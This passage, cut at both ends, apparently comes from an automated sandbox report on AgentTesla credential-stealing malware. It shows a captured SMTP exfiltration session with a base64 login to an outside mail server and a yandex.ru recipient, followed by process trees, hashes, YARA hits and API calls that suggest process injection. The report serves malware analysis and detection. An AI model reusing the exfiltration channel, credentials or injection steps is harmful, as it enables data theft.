                                                        Jan 1, 2022 09:13:03.982043982 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | QUIT
                                                        Jan 1, 2022 09:13:04.122360945 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 221 bh-ht-15.webhostbox.net closing connection
                                                        Jan 1, 2022 09:13:04.822457075 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:13:04 +0000
                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                            220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:13:04.822925091 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | EHLO 373836
                                                        Jan 1, 2022 09:13:04.962836981 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPE_CONNECT
                                                            250-AUTH PLAIN LOGIN
                                                            250-STARTTLS
                                                            250 HELP
                                                        Jan 1, 2022 09:13:04.963478088 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:13:05.103945017 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:13:05.247020006 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 235 Authentication succeeded
                                                        Jan 1, 2022 09:13:05.247709036 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:13:05.387444019 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 250 OK
                                                        Jan 1, 2022 09:13:05.387980938 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:13:05.582730055 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 250 Accepted
                                                        Jan 1, 2022 09:13:05.583429098 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | DATA
                                                        Jan 1, 2022 09:13:05.723213911 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:13:05.724633932 CET | 49804 | 587 | 192.168.2.3 | 162.241.148.206 | .
                                                        Jan 1, 2022 09:13:05.864609957 CET | 587 | 49804 | 162.241.148.206 | 192.168.2.3 | 250 OK id=1n3ZVh-003GxB-L1
                                                        Jan 1, 2022 09:13:43.928107023 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | QUIT
                                                        Jan 1, 2022 09:13:44.070090055 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 221 bh-ht-15.webhostbox.net closing connection

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Memory Usage

                                                        High Level Behavior Distribution

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time: 09:10:06
                                                        Start date: 01/01/2022
                                                        Path: C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                                                        Imagebase: 0x7ff7fffa0000
                                                        File size: 163840 bytes
                                                        MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 09:10:08
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: "C:\Users\user\AppData\Local\Temp\anyname.exe"
                                                        Imagebase: 0x10000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:17
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase: 0x1a0000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: C, C++ or other language
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:19
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase: 0x150000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: C, C++ or other language
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:20
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase: 0x190000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: C, C++ or other language
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:22
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase: 0xa00000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:54
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                                                        Imagebase: 0x750000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation: low

                                                        General

                                                        Start time: 09:10:59
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Imagebase: 0xc10000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation: low

                                                        General

                                                        Start time: 09:11:03
                                                        Start date: 01/01/2022
                                                        Path: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                                                        Imagebase: 0x4b0000
                                                        File size: 717312 bytes
                                                        MD5 hash: 9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges: false
                                                        Has administrator privileges: false
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:09:11:08
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Imagebase:0xba0000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Disassembly

                                                        Code Analysis

                                                          Executed Functions

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BD7196
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00CD5431
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00CD5431
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BD6D68
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BD6E48
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 06BD6BBE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDE0E9,00000800,00000000,00000000), ref: 00CDE2FA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BD6C86
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDE06E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostMessageW.USER32(?,?,?,?), ref: 06BD9825
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828830508.00000000067B0000.00000040.00000010.sdmp, Offset: 067B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <m
                                                          • API String ID: 0-1709939129
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D69A0
                                                          • GetCurrentThread.KERNEL32 ref: 014D69DD
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6A1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6A73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D69A0
                                                          • GetCurrentThread.KERNEL32 ref: 014D69DD
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6A1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6A73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014D51A2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014D51A2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 014D7F09
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 014DC222
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID:
                                                          • API String ID: 2118026453-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
